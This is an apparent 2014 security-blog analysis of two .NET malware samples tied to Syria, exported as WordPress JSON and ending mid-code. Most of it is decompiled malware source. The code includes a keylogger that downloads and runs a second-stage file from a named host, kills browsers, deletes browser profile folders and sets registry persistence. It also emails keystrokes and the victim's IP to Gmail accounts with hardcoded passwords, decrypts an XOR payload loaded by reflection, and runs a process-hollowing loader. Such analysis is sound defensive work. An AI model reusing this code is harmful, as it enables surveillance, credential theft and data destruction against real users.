{"id":834,"date":"2014-07-29T02:37:24","date_gmt":"2014-07-29T02:37:24","guid":{"rendered":"http:\/\/www.gironsec.com\/blog\/?p=834"},"modified":"2014-07-29T02:39:47","modified_gmt":"2014-07-29T02:39:47","slug":"syrian-malware-2-electric-boogaloo","status":"publish","type":"post","link":"https:\/\/www.gironsec.com\/blog\/2014\/07\/syrian-malware-2-electric-boogaloo\/","title":{"rendered":"Syrian Malware 2 – Electric Boogaloo"},"content":{"rendered":"

Back for part 2 are we? Let’s get this show on the road. We’ve seen how awful the first piece of malware was in terms of how it was thrown together in all but 10 minutes, but you aint seen nothing yet. The next one actually embeds passwords inside and even email addresses. After that, I’ll go over a little more complicated example which uses reflection and a laughable encryption routine complete with code to decrypt. I’ll even include the source code. <\/p>\n

Filename: MyLogerMailEnd.exe
\nMD5 Hash: 7D867D6BD5FC3015A31FDFA121BA9187
\nDetection ratio: 42 \/ 50<\/p>\n

Yet another .net binary straight outta Syria. binary ships with multiple classes. The first one that stands out is a class for logging keystrokes, unless you can think of another reason to name your class ‘keyboard’ and make use of the API SetWindowsHookExA(). For those of you who don’t know, you can use this API to trap window messages \/ keyboard events and extract the virtual key codes from each for logging. A method as old as windows itself.
\n \"mylog1\"<\/a><\/p>\n

Now let’s go over the code in the ‘Form’ class. It’s rather interesting.<\/p>\n

<\/p>\n

\n
private<\/span> void<\/span> Form1_Load<\/span>(object<\/span> sender, EventArgs e)\r\n{\r\n\ttry<\/span>\r\n\t{\r\n\t\tbool<\/span> flag = !File.Exists("c:\\\\d.doc"<\/span>);\r\n\t\tif<\/span> (flag)\r\n\t\t{\r\n\t\t\tMyProject.Computer.Network.DownloadFile("http:\/\/www.ckku.com\/includes\/d.doc"<\/span>, "c:\\\\Windows\\\\d.doc"<\/span>);\r\n\t\t}\r\n\t\tThread.Sleep(4000<\/span>);\r\n\t\tflag = File.Exists("c:\\\\Windows\\\\d.doc"<\/span>);\r\n\t\tif<\/span> (flag)\r\n\t\t{\r\n\t\t\tProcess.Start("c:\\\\Windows\\\\d.doc"<\/span>);\r\n\t\t}\r\n\t}\r\n\tcatch<\/span> (Exception expr_59)\r\n\t{\r\n\t\tProjectData.SetProjectError(expr_59);\r\n\t\tProjectData.ClearProjectError();\r\n\t}\r\n\tThread.Sleep(30000<\/span>);\r\n\tthis<\/span>.Hide();\r\n\tthis<\/span>.k.CreateHook();\r\n\tProcess[] processesByName = Process.GetProcessesByName("iexplore"<\/span>);\r\n\tProcess[] processesByName2 = Process.GetProcessesByName("firefox"<\/span>);\r\n\tProcess[] processesByName3 = Process.GetProcessesByName("chrome"<\/span>);\r\n\tProcess[] processesByName4 = Process.GetProcessesByName("opera"<\/span>);\r\n\tProcess[] processesByName5 = Process.GetProcessesByName("Safari"<\/span>);\r\n\tProcess[] processesByName6 = Process.GetProcessesByName("keyscrambler"<\/span>);\r\n\tProcess[] processesByName7 = Process.GetProcessesByName("Skype"<\/span>);\r\n\tchecked<\/span>\r\n\t{\r\n\t\ttry<\/span>\r\n\t\t{\r\n\t\t\tProcess[] array = processesByName;\r\n\t\t\tfor<\/span> (int<\/span> i = 0<\/span>; i < array.Length; i++)\r\n\t\t\t{\r\n\t\t\t\tProcess process = array[i];\r\n\t\t\t\tprocess.Kill();\r\n\t\t\t}\r\n\t\t\tProcess[] array2 = processesByName2;\r\n\t\t\tfor<\/span> (int<\/span> j = 0<\/span>; j < array2.Length; j++)\r\n\t\t\t{\r\n\t\t\t\tProcess process2 = array2[j];\r\n\t\t\t\tprocess2.Kill();\r\n\t\t\t}\r\n\t\t\tProcess[] array3 = processesByName3;\r\n\t\t\tfor<\/span> (int<\/span> k = 0<\/span>; k < array3.Length; k++)\r\n\t\t\t{\r\n\t\t\t\tProcess process3 = array3[k];\r\n\t\t\t\tprocess3.Kill();\r\n\t\t\t}\r\n\t\t\tProcess[] array4 = processesByName4;\r\n\t\t\tfor<\/span> (int<\/span> l = 0<\/span>; l < array4.Length; l++)\r\n\t\t\t{\r\n\t\t\t\tProcess process4 = array4[l];\r\n\t\t\t\tprocess4.Kill();\r\n\t\t\t}\r\n\t\t\tProcess[] array5 = processesByName5;\r\n\t\t\tfor<\/span> (int<\/span> m = 0<\/span>; m < array5.Length; m++)\r\n\t\t\t{\r\n\t\t\t\tProcess process5 = array5[m];\r\n\t\t\t\tprocess5.Kill();\r\n\t\t\t}\r\n\t\t\tProcess[] array6 = processesByName6;\r\n\t\t\tfor<\/span> (int<\/span> n = 0<\/span>; n < array6.Length; n++)\r\n\t\t\t{\r\n\t\t\t\tProcess process6 = array6[n];\r\n\t\t\t\tprocess6.Kill();\r\n\t\t\t}\r\n\t\t\tProcess[] array7 = processesByName7;\r\n\t\t\tfor<\/span> (int<\/span> num = 0<\/span>; num < array7.Length; num++)\r\n\t\t\t{\r\n\t\t\t\tProcess process7 = array7[num];\r\n\t\t\t\tprocess7.Kill();\r\n\t\t\t}\r\n\t\t\tstring<\/span> text = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData);\r\n\t\t\ttext += "\\\\Mozilla\\\\Firefox\\\\Profiles\\\\"<\/span>;\r\n\t\t\tMyProject.Computer.FileSystem.DeleteDirectory(text, DeleteDirectoryOption.DeleteAllContents);\r\n\t\t\tstring<\/span> folderPath = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData);\r\n\t\t\ttext += "\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\"<\/span>;\r\n\t\t\tMyProject.Computer.FileSystem.DeleteDirectory(folderPath, DeleteDirectoryOption.DeleteAllContents);\r\n\t\t\tstring<\/span> folderPath2 = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData);\r\n\t\t\ttext += "\\\\Opera\\\\Opera\\\\cache\\\\"<\/span>;\r\n\t\t\tMyProject.Computer.FileSystem.DeleteDirectory(folderPath2, DeleteDirectoryOption.DeleteAllContents);\r\n\t\t\tfolderPath2 = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData);\r\n\t\t\ttext += "\\\\Apple Computer\\\\Safari\\\\History\\\\"<\/span>;\r\n\t\t\tstring<\/span> directory;\r\n\t\t\tMyProject.Computer.FileSystem.DeleteDirectory(directory, DeleteDirectoryOption.DeleteAllContents);\r\n\t\t\tfolderPath2 = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData);\r\n\t\t\ttext += "\\\\Microsoft\\\\Windows\\\\Temporary Internet Files\\\\"<\/span>;\r\n\t\t\tstring<\/span> directory2;\r\n\t\t\tMyProject.Computer.FileSystem.DeleteDirectory(directory2, DeleteDirectoryOption.DeleteAllContents);\r\n\t\t}\r\n\t\tcatch<\/span> (Exception expr_2EA)\r\n\t\t{\r\n\t\t\tProjectData.SetProjectError(expr_2EA);\r\n\t\t\tProjectData.ClearProjectError();\r\n\t\t}\r\n\t\tstring<\/span> text2 = this<\/span>.RichTextBox1.Text;\r\n\t\tbool<\/span> flag = text2.Contains("facebook"<\/span>) | text2.Contains("FACEBOOK"<\/span>) | text2.Contains("hotmail"<\/span>) | text2.Contains("HOTMAIL"<\/span>) | text2.Contains("yahoo"<\/span>) | text2.Contains("YAHOO"<\/span>) | text2.Contains("GMAIL"<\/span>) | text2.Contains("gmail"<\/span>);\r\n\t\tif<\/span> (flag)\r\n\t\t{\r\n\t\t}\r\n\t\tstring<\/span> text3 = "C:\\\\Users\\\\system.exe"<\/span>;\r\n\t\tstring<\/span> text4 = "C:\\\\Windows\\\\system.exe"<\/span>;\r\n\t\tstring<\/span> text5 = "D:\\\\system.exe"<\/span>;\r\n\t\ttry<\/span>\r\n\t\t{\r\n\t\t\tflag = !File.Exists(text3);\r\n\t\t\tif<\/span> (flag)\r\n\t\t\t{\r\n\t\t\t\tstring<\/span> fileName = Path.GetFileName(Application.ExecutablePath);\r\n\t\t\t\tMyProject.Computer.FileSystem.CopyFile(fileName, text3, true<\/span>);\r\n\t\t\t\tFile.SetAttributes(text3, File.GetAttributes(text3) | FileAttributes.Hidden);\r\n\t\t\t}\r\n\t\t\telse<\/span>\r\n\t\t\t{\r\n\t\t\t\tflag = !File.Exists(text4);\r\n\t\t\t\tif<\/span> (flag)\r\n\t\t\t\t{\r\n\t\t\t\t\tstring<\/span> fileName2 = Path.GetFileName(Application.ExecutablePath);\r\n\t\t\t\t\tMyProject.Computer.FileSystem.CopyFile(fileName2, text4, true<\/span>);\r\n\t\t\t\t\tFile.SetAttributes(text4, File.GetAttributes(text4) | FileAttributes.Hidden);\r\n\t\t\t\t}\r\n\t\t\t\telse<\/span>\r\n\t\t\t\t{\r\n\t\t\t\t\tflag = !File.Exists(text5);\r\n\t\t\t\t\tif<\/span> (flag)\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tstring<\/span> fileName3 = Path.GetFileName(Application.ExecutablePath);\r\n\t\t\t\t\t\tMyProject.Computer.FileSystem.CopyFile(fileName3, text5, true<\/span>);\r\n\t\t\t\t\t\tFile.SetAttributes(text5, File.GetAttributes(text5) | FileAttributes.Hidden);\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t\tcatch<\/span> (Exception expr_44A)\r\n\t\t{\r\n\t\t\tProjectData.SetProjectError(expr_44A);\r\n\t\t\tProjectData.ClearProjectError();\r\n\t\t}\r\n\t\ttry<\/span>\r\n\t\t{\r\n\t\t\tRegistryKey registryKey = Registry.CurrentUser.OpenSubKey("SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run"<\/span>, true<\/span>);\r\n\t\t\tregistryKey.SetValue("System1"<\/span>, "\\""<\/span> + text3 + "\\""<\/span>);\r\n\t\t\tregistryKey.Close();\r\n\t\t\tregistryKey = Registry.CurrentUser.OpenSubKey("SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run"<\/span>, true<\/span>);\r\n\t\t\tregistryKey.SetValue("System2"<\/span>, "\\""<\/span> + text4 + "\\""<\/span>);\r\n\t\t\tregistryKey.Close();\r\n\t\t\tregistryKey = Registry.CurrentUser.OpenSubKey("SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run"<\/span>, true<\/span>);\r\n\t\t\tregistryKey.SetValue("System2"<\/span>, "\\""<\/span> + text5 + "\\""<\/span>);\r\n\t\t\tregistryKey.Close();\r\n\t\t}\r\n\t\tcatch<\/span> (Exception expr_503)\r\n\t\t{\r\n\t\t\tProjectData.SetProjectError(expr_503);\r\n\t\t\tProjectData.ClearProjectError();\r\n\t\t}\r\n\t}\r\n}\r\n<\/pre>\n<\/div>\n
It starts off by checking for the contents of the file ‘d.doc’ in the windows directory. If the file doesn’t exist (ie; first run), then it attempts to download the file from “http:\/\/www.ckku.com\/includes\/d.doc”, likely some hacked site used to deliver stage 3.  Next it checks to see if any browsers are running as well as Skype, and ‘keyscrambler’ – an anti key logging program. It then attempts to kill said processes. After that, the malware copies itself to the locations C:\\\\Users\\\\system.exe, C:\\\\Windows\\\\system.exe, and D:\\\\system.exe and sets the file flags as hidden. Finally, it adds itself to start up using the all to familiar registry key “HKLM\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run”.<\/p>\n
That’s fine and dandy, but let’s bring on the fail shall we?
\nThere are 3 timer objects, set to go off every 30 seconds or so.
\nTimer1:
\n<\/p>\n
\n
private<\/span> void<\/span> Timer1_Tick<\/span>(object<\/span> sender, EventArgs e)\r\n{\r\n\tbool<\/span> flag = this<\/span>.isRunning("skype.exe"<\/span>);\r\n\tif<\/span> (flag)\r\n\t{\r\n\t\tbool<\/span> flag2 = this<\/span>.RichTextBox2.TextLength > 0<\/span>;\r\n\t\tif<\/span> (flag2)\r\n\t\t{\r\n\t\t\ttry<\/span>\r\n\t\t\t{\r\n\t\t\t\tHttpWebRequest httpWebRequest = (HttpWebRequest)WebRequest.Create("http:\/\/automation.whatismyip.com\/n09230945.asp"<\/span>);\r\n\t\t\t\tHttpWebResponse httpWebResponse = (HttpWebResponse)httpWebRequest.GetResponse();\r\n\t\t\t\tStream responseStream = httpWebResponse.GetResponseStream();\r\n\t\t\t\tStreamReader streamReader = new<\/span> StreamReader(responseStream);\r\n\t\t\t\tstring<\/span> str = streamReader.ReadToEnd();\r\n\t\t\t\tMailMessage mailMessage = new<\/span> MailMessage();\r\n\t\t\t\tmailMessage.From = new<\/span> MailAddress("bestjamool@gmail.com"<\/span>);\r\n\t\t\t\tmailMessage.To.Add("bestjamool@gmail.com"<\/span>);\r\n\t\t\t\tmailMessage.To.Add("933luckystrike@gmail.com"<\/span>);\r\n\t\t\t\tmailMessage.Subject = "New Message Skype Account from"<\/span> + MyProject.User.Name;\r\n\t\t\t\tmailMessage.Body = "Ip Addres Is : "<\/span> + str + "\\r\\n"<\/span> + this<\/span>.RichTextBox2.Text;\r\n\t\t\t\tnew<\/span> SmtpClient<\/span>("smtp.gmail.com"<\/span>)\r\n\t\t\t\t{\r\n\t\t\t\t\tPort = 587<\/span>,\r\n\t\t\t\t\tCredentials = new<\/span> NetworkCredential("bestjamool@gmail.com"<\/span>, "masterhacker!@)"<\/span>),\r\n\t\t\t\t\tEnableSsl = true<\/span>\r\n\t\t\t\t}.Send(mailMessage);\r\n\t\t\t\tthis<\/span>.RichTextBox2.Text = ""<\/span>;\r\n\t\t\t}\r\n\t\t\tcatch<\/span> (Exception expr_12D)\r\n\t\t\t{\r\n\t\t\t\tProjectData.SetProjectError(expr_12D);\r\n\t\t\t\tProjectData.ClearProjectError();\r\n\t\t\t}\r\n\t\t}\r\n\t\telse<\/span>\r\n\t\t{\r\n\t\t\tthis<\/span>.RichTextBox2.Text = ""<\/span>;\r\n\t\t}\r\n\t}\r\n}\r\n<\/pre>\n<\/div>\n
Timer 2:
\n<\/p>\n
\n
private<\/span> void<\/span> Timer2_Tick<\/span>(object<\/span> sender, EventArgs e)\r\n{\r\n\ttry<\/span>\r\n\t{\r\n\t\tHttpWebRequest httpWebRequest = (HttpWebRequest)WebRequest.Create("http:\/\/automation.whatismyip.com\/n09230945.asp"<\/span>);\r\n\t\tHttpWebResponse httpWebResponse = (HttpWebResponse)httpWebRequest.GetResponse();\r\n\t\tStream responseStream = httpWebResponse.GetResponseStream();\r\n\t\tStreamReader streamReader = new<\/span> StreamReader(responseStream);\r\n\t\tstring<\/span> str = streamReader.ReadToEnd();\r\n\t\tstring<\/span> text = this<\/span>.RichTextBox1.Text;\r\n\t\tbool<\/span> flag = text.Contains("facebook"<\/span>) | text.Contains("FACEBOOK"<\/span>) | text.Contains("hotmail"<\/span>) | text.Contains("HOTMAIL"<\/span>) | text.Contains("yahoo"<\/span>) | text.Contains("YAHOO"<\/span>) | text.Contains("GMAIL"<\/span>) | text.Contains("gmail"<\/span>);\r\n\t\tif<\/span> (flag)\r\n\t\t{\r\n\t\t\tthis<\/span>.Timer2.Start();\r\n\t\t\tMailMessage mailMessage = new<\/span> MailMessage();\r\n\t\t\tmailMessage.From = new<\/span> MailAddress("bestjamool@gmail.com"<\/span>);\r\n\t\t\tmailMessage.To.Add("bestjamool@gmail.com"<\/span>);\r\n\t\t\tmailMessage.To.Add("933luckystrike@gmail.com"<\/span>);\r\n\t\t\tmailMessage.Subject = "New Account From "<\/span> + MyProject.User.Name;\r\n\t\t\tmailMessage.Body = "Ip Addres Is : "<\/span> + str + "\\r\\n"<\/span> + this<\/span>.RichTextBox1.Text;\r\n\t\t\tnew<\/span> SmtpClient<\/span>("smtp.gmail.com"<\/span>)\r\n\t\t\t{\r\n\t\t\t\tPort = 587<\/span>,\r\n\t\t\t\tCredentials = new<\/span> NetworkCredential("bestjamool@gmail.com"<\/span>, "masterhacker!@)"<\/span>),\r\n\t\t\t\tEnableSsl = true<\/span>\r\n\t\t\t}.Send(mailMessage);\r\n\t\t\tthis<\/span>.RichTextBox1.Text = ""<\/span>;\r\n\t\t}\r\n\t\telse<\/span>\r\n\t\t{\r\n\t\t\tthis<\/span>.RichTextBox1.Text = ""<\/span>;\r\n\t\t}\r\n\t}\r\n\tcatch<\/span> (Exception expr_19E)\r\n\t{\r\n\t\tProjectData.SetProjectError(expr_19E);\r\n\t\tProjectData.ClearProjectError();\r\n\t}\r\n}\r\n<\/pre>\n<\/div>\n
And last but not least, timer 3:
\n<\/p>\n
\n
private<\/span> void<\/span> Timer3_Tick<\/span>(object<\/span> sender, EventArgs e)\r\n{\r\n\tbool<\/span> flag = this<\/span>.isRunning("skype.exe"<\/span>);\r\n\tif<\/span> (flag)\r\n\t{\r\n\t\tbool<\/span> flag2 = this<\/span>.RichTextBox2.TextLength > 0<\/span>;\r\n\t\tif<\/span> (flag2)\r\n\t\t{\r\n\t\t\ttry<\/span>\r\n\t\t\t{\r\n\t\t\t\tHttpWebRequest httpWebRequest = (HttpWebRequest)WebRequest.Create("http:\/\/automation.whatismyip.com\/n09230945.asp"<\/span>);\r\n\t\t\t\tHttpWebResponse httpWebResponse = (HttpWebResponse)httpWebRequest.GetResponse();\r\n\t\t\t\tStream responseStream = httpWebResponse.GetResponseStream();\r\n\t\t\t\tStreamReader streamReader = new<\/span> StreamReader(responseStream);\r\n\t\t\t\tstring<\/span> str = streamReader.ReadToEnd();\r\n\t\t\t\tMailMessage mailMessage = new<\/span> MailMessage();\r\n\t\t\t\tmailMessage.From = new<\/span> MailAddress("933luckystrike@gmail.com"<\/span>);\r\n\t\t\t\tmailMessage.To.Add("bestjamool@gmail.com"<\/span>);\r\n\t\t\t\tmailMessage.To.Add("933luckystrike@gmail.com"<\/span>);\r\n\t\t\t\tmailMessage.Subject = "New Message Skype Account from"<\/span> + MyProject.User.Name;\r\n\t\t\t\tmailMessage.Body = "Ip Addres Is : "<\/span> + str + "\\r\\n"<\/span> + this<\/span>.RichTextBox2.Text;\r\n\t\t\t\tnew<\/span> SmtpClient<\/span>("smtp.gmail.com"<\/span>)\r\n\t\t\t\t{\r\n\t\t\t\t\tPort = 587<\/span>,\r\n\t\t\t\t\tCredentials = new<\/span> NetworkCredential("933luckystrike@gmail.com"<\/span>, "masterhacker!@))"<\/span>),\r\n\t\t\t\t\tEnableSsl = true<\/span>\r\n\t\t\t\t}.Send(mailMessage);\r\n\t\t\t\tthis<\/span>.RichTextBox2.Text = ""<\/span>;\r\n\t\t\t}\r\n\t\t\tcatch<\/span> (Exception expr_12D)\r\n\t\t\t{\r\n\t\t\t\tProjectData.SetProjectError(expr_12D);\r\n\t\t\t\tProjectData.ClearProjectError();\r\n\t\t\t}\r\n\t\t}\r\n\t\telse<\/span>\r\n\t\t{\r\n\t\t\tthis<\/span>.RichTextBox2.Text = ""<\/span>;\r\n\t\t}\r\n\t}\r\n}\r\n<\/pre>\n<\/div>\n
\"1404838449738\"<\/a><\/p>\n
That’s right, included in the drop is the gmail user \/ password. And before you check, I’ll save you time – google already locked out the accounts. <\/p>\n
All in all, the malware attempts to download and run a second binary, starts logging keystrokes, kills the browsers, and loads itself on startup, all the while sending the keystrokes and IP address to some gmail address. <\/p>\n
Now for the second binary. <\/p>\n
Filename:        derp_syria.exe
\nMD5 Hash:        C09D23A8E44C3170E9AF0132788FCEB0
\nDetection ratio: 44 \/ 49 <\/p>\n
It is of course a .net binary (surprise surprise). First introspection when opened up in .net decompiler we see a binary stream in the form of a resource file. <\/p>\n
\"syr1\"<\/a>
\nAnd a look see at the file:
\n\"syr3\"<\/a>
\nDefinitely something to this judging by its size and repetition of characters. We’ll come back to that later. <\/p>\n
Peeking at the source code of the main method \/ classes, we see how malware uses this benign resource file. <\/p>\n
<\/p>\n
\n
using<\/span> Project1_Remake.Properties<\/span>;\r\nusing<\/span> System<\/span>;\r\nusing<\/span> System.ComponentModel<\/span>;\r\nusing<\/span> System.Reflection<\/span>;\r\nusing<\/span> System.Text<\/span>;\r\nnamespace<\/span> Project1_Remake<\/span>\r\n{\r\n\tpublic<\/span> class<\/span> Component1<\/span> : Component\r\n\t{\r\n\t\tprivate<\/span> static<\/span> byte<\/span>[] myShit = Convert.FromBase64String(Resources.String1);\r\n\t\tprivate<\/span> static<\/span> string<\/span> whatacrap = "Doc"<\/span>;\r\n\t\tprivate<\/span> static<\/span> byte<\/span> myFirstbyte;\r\n\t\tprivate<\/span> static<\/span> byte<\/span>[] myFirstarraybyte;\r\n\t\tprivate<\/span> static<\/span> byte<\/span>[] mySecondarraybyte;\r\n\t\tprivate<\/span> static<\/span> int<\/span> nysKO = 0<\/span>;\r\n\t\tprivate<\/span> IContainer components;\r\n\t\tpublic<\/span> static<\/span> byte<\/span>[] polyMal<\/span>()\r\n\t\t{\r\n\t\t\tArray.Reverse(Component1.myShit);\r\n\t\t\tComponent1.myFirstbyte = Component1.myShit[Component1.myShit.Length - 1<\/span>];\r\n\t\t\tComponent1.myFirstarraybyte = Encoding.ASCII.GetBytes(Component1.whatacrap);\r\n\t\t\tComponent1.mySecondarraybyte = new<\/span> byte<\/span>[Component1.myShit.Length + 1<\/span>];\r\n\t\t\tfor<\/span> (int<\/span> i = 0<\/span>; i <= Component1.myShit.Length - 1<\/span>; i++)\r\n\t\t\t{\r\n\t\t\t\tComponent1.mySecondarraybyte[i] = Convert.ToByte((int<\/span>)(Component1.myShit[i] ^ Component1.myFirstbyte ^ Component1.myFirstarraybyte[Component1.nysKO]));\r\n\t\t\t\tArray.Reverse(Component1.myFirstarraybyte);\r\n\t\t\t\tif<\/span> (Component1.nysKO == Component1.myFirstarraybyte.Length - 1<\/span>)\r\n\t\t\t\t{\r\n\t\t\t\t\tComponent1.nysKO = 0<\/span>;\r\n\t\t\t\t}\r\n\t\t\t\telse<\/span>\r\n\t\t\t\t{\r\n\t\t\t\t\tComponent1.nysKO++;\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\tArray.Resize<byte<\/span>>(ref<\/span> Component1.mySecondarraybyte, Component1.mySecondarraybyte.Length - 2<\/span>);\r\n\t\t\treturn<\/span> Component1.mySecondarraybyte;\r\n\t\t}\r\n\t\tprivate<\/span> static<\/span> void<\/span> Main<\/span>()\r\n\t\t{\r\n\t\t\tbyte<\/span>[] rawAssembly = Component1.polyMal();\r\n\t\t\tAssembly assembly = AppDomain.CurrentDomain.Load(rawAssembly);\r\n\t\t\tType type = assembly.GetType("Project1.ue4tretr"<\/span>);\r\n\t\t\tMethodInfo method = type.GetMethod("tuy5u6ruy"<\/span>);\r\n\t\t\tmethod.Invoke(null<\/span>, null<\/span>);\r\n\t\t}\r\n\t\tprotected<\/span> override<\/span> void<\/span> Dispose<\/span>(bool<\/span> disposing)\r\n\t\t{\r\n\t\t\tif<\/span> (disposing && this<\/span>.components != null<\/span>)\r\n\t\t\t{\r\n\t\t\t\tthis<\/span>.components.Dispose();\r\n\t\t\t}\r\n\t\t\tbase<\/span>.Dispose(disposing);\r\n\t\t}\r\n\t\tprivate<\/span> void<\/span> InitializeComponent<\/span>()\r\n\t\t{\r\n\t\t\tthis<\/span>.components = new<\/span> Container();\r\n\t\t}\r\n\t}\r\n}\r\n<\/pre>\n<\/div>\n
<\/p>\n
\n
using<\/span> System<\/span>;\r\nusing<\/span> System.CodeDom.Compiler<\/span>;\r\nusing<\/span> System.ComponentModel<\/span>;\r\nusing<\/span> System.Diagnostics<\/span>;\r\nusing<\/span> System.Globalization<\/span>;\r\nusing<\/span> System.Resources<\/span>;\r\nusing<\/span> System.Runtime.CompilerServices<\/span>;\r\nnamespace<\/span> Project1_Remake.Properties<\/span>\r\n{\r\n\t[GeneratedCode("System.Resources.Tools.StronglyTypedResourceBuilder", "4.0.0.0"), DebuggerNonUserCode, CompilerGenerated]<\/span>\r\n\tinternal<\/span> class<\/span> Resources<\/span>\r\n\t{\r\n\t\tprivate<\/span> static<\/span> ResourceManager resourceMan;\r\n\t\tprivate<\/span> static<\/span> CultureInfo resourceCulture;\r\n\t\t[EditorBrowsable(EditorBrowsableState.Advanced)]<\/span>\r\n\t\tinternal<\/span> static<\/span> ResourceManager ResourceManager\r\n\t\t{\r\n\t\t\tget<\/span>\r\n\t\t\t{\r\n\t\t\t\tif<\/span> (object<\/span>.ReferenceEquals(Resources.resourceMan, null<\/span>))\r\n\t\t\t\t{\r\n\t\t\t\t\tResourceManager resourceManager = new<\/span> ResourceManager("Project1_Remake.Properties.Resources"<\/span>, typeof<\/span>(Resources).Assembly);\r\n\t\t\t\t\tResources.resourceMan = resourceManager;\r\n\t\t\t\t}\r\n\t\t\t\treturn<\/span> Resources.resourceMan;\r\n\t\t\t}\r\n\t\t}\r\n\t\t[EditorBrowsable(EditorBrowsableState.Advanced)]<\/span>\r\n\t\tinternal<\/span> static<\/span> CultureInfo Culture\r\n\t\t{\r\n\t\t\tget<\/span>\r\n\t\t\t{\r\n\t\t\t\treturn<\/span> Resources.resourceCulture;\r\n\t\t\t}\r\n\t\t\tset<\/span>\r\n\t\t\t{\r\n\t\t\t\tResources.resourceCulture = value<\/span>;\r\n\t\t\t}\r\n\t\t}\r\n\t\tinternal<\/span> static<\/span> string<\/span> String1\r\n\t\t{\r\n\t\t\tget<\/span>\r\n\t\t\t{\r\n\t\t\t\treturn<\/span> Resources.ResourceManager.GetString("String1"<\/span>, Resources.resourceCulture);\r\n\t\t\t}\r\n\t\t}\r\n\t\tinternal<\/span> Resources<\/span>()\r\n\t\t{\r\n\t\t}\r\n\t}\r\n}\r\n<\/pre>\n<\/div>\n
Ya like that eh? Rot 13 meets XOR. The beauty of .net is how easy it is to rip off other people’s code. And that’s what I’m gonna do now, in order to get to payload of this malware – what it intends to run. Instead of launching with the ‘method.invoke()’ call, I’m just writing the contents of the byte stream to a file for analysis:
\n\"syr2\"<\/a><\/p>\n
After running, we can now pick apart the contents of ‘lolfile.joe’ and yes, it IS another .net binary. <\/p>\n
Filename:         lolfail.joe
\nMD5 Hash:         0AB60A0C36A61054E094DB02CB30EF38
\nDetection Ratio:  Unknown<\/p>\n
Here’s ‘lolfile.joe’ in the disassembler:
\n\"syr6\"<\/a><\/p>\n
And before you say it, yes, there IS another binary in the resources! Not encrypted this time, but still.
\n\"syr4\"<\/a><\/p>\n
Here it is again in the decompiler. Very convoluted, but not encrypted. I wouldn’t even say obfuscated, just arranged weird:
\n\"syr5\"<\/a><\/p>\n
This new binary does nothing more than place the binary ‘sppnp.exe’ on startup using the registry. Not very interesting. <\/p>\n
Let’s focus on the interesting stuff now. The first class named ‘RuntimePortableExecutable’ contains methods for the creation and execution of an exe file via injection or process hollowing. The API’s that stand out and make this evident are WriteProcessMemory, VirtualProtectEx, ResumeThread, ZwUnmapViewOfSection, GetThreadContext, and SetThreadContext. <\/p>\n
Two methods that stand out are used for the creation \/ injection of an exe into a processes’ memory. There’s a method for windows xp, and windows 7:<\/p>\n
XP<\/p>\n
\n
public<\/span> static<\/span> void<\/span> WindowsXp<\/span>(byte<\/span>[] data, string<\/span> target)\r\n\t\t{\r\n\t\t\tRuntimePortableExecutable.Context context = default<\/span>(RuntimePortableExecutable.Context);\r\n\t\t\tRuntimePortableExecutable.ProcessInformation processInformation = default<\/span>(RuntimePortableExecutable.ProcessInformation);\r\n\t\t\tRuntimePortableExecutable.StartupInformation startupInformation = default<\/span>(RuntimePortableExecutable.StartupInformation);\r\n\t\t\tRuntimePortableExecutable.SecurityFlags securityFlags = default<\/span>(RuntimePortableExecutable.SecurityFlags);\r\n\t\t\tRuntimePortableExecutable.SecurityFlags securityFlags2 = default<\/span>(RuntimePortableExecutable.SecurityFlags);\r\n\t\t\tGCHandle gCHandle = GCHandle.Alloc(data, GCHandleType.Pinned);\r\n\t\t\tIntPtr intPtr = gCHandle.AddrOfPinnedObject();\r\n\t\t\tint<\/span> num = intPtr.ToInt32();\r\n\t\t\tRuntimePortableExecutable.DosHeader dosHeader;\r\n\t\t\tobject<\/span> expr_59 = Marshal.PtrToStructure(gCHandle.AddrOfPinnedObject(), dosHeader.GetType());\r\n\t\t\tRuntimePortableExecutable.DosHeader dosHeader2;\r\n\t\t\tdosHeader = ((expr_59 != null<\/span>) ? ((RuntimePortableExecutable.DosHeader)expr_59) : dosHeader2);\r\n\t\t\tgCHandle.Free();\r\n\t\t\tstring<\/span> text = null<\/span>;\r\n\t\t\tbool<\/span> arg_8B_4 = false<\/span>;\r\n\t\t\tuint<\/span> arg_8B_5 = 4<\/span>u;\r\n\t\t\tIntPtr intPtr2;\r\n\t\t\tIntPtr arg_8B_6 = intPtr2;\r\n\t\t\tstring<\/span> text2 = null<\/span>;\r\n\t\t\tif<\/span> (!(-(RuntimePortableExecutable.CreateProcess(ref<\/span> text, ref<\/span> target, ref<\/span> securityFlags, ref<\/span> securityFlags2, arg_8B_4, arg_8B_5, arg_8B_6, ref<\/span> text2, ref<\/span> startupInformation, out<\/span> processInformation) > false<\/span>)))\r\n\t\t\t{\r\n\t\t\t\treturn<\/span>;\r\n\t\t\t}\r\n\t\t\tintPtr = new<\/span> IntPtr(num + dosHeader.Address);\r\n\t\t\tRuntimePortableExecutable.NtHeaders ntHeaders;\r\n\t\t\tobject<\/span> expr_BB = Marshal.PtrToStructure(intPtr, ntHeaders.GetType());\r\n\t\t\tRuntimePortableExecutable.NtHeaders ntHeaders2;\r\n\t\t\tntHeaders = ((expr_BB != null<\/span>) ? ((RuntimePortableExecutable.NtHeaders)expr_BB) : ntHeaders2);\r\n\t\t\tstartupInformation.CB = Strings.Len(startupInformation);\r\n\t\t\tcontext.Flags = 65538<\/span>u;\r\n\t\t\tif<\/span> ((ulong<\/span>)ntHeaders.Signature != 17744<\/span>uL | dosHeader.Magic != 23117<\/span>)\r\n\t\t\t{\r\n\t\t\t\treturn<\/span>;\r\n\t\t\t}\r\n\t\t\tbool<\/span> arg_163_0 = RuntimePortableExecutable.GetThreadContext(processInformation.Thread, ref<\/span> context);\r\n\t\t\tIntPtr arg_150_0 = processInformation.Process;\r\n\t\t\tIntPtr 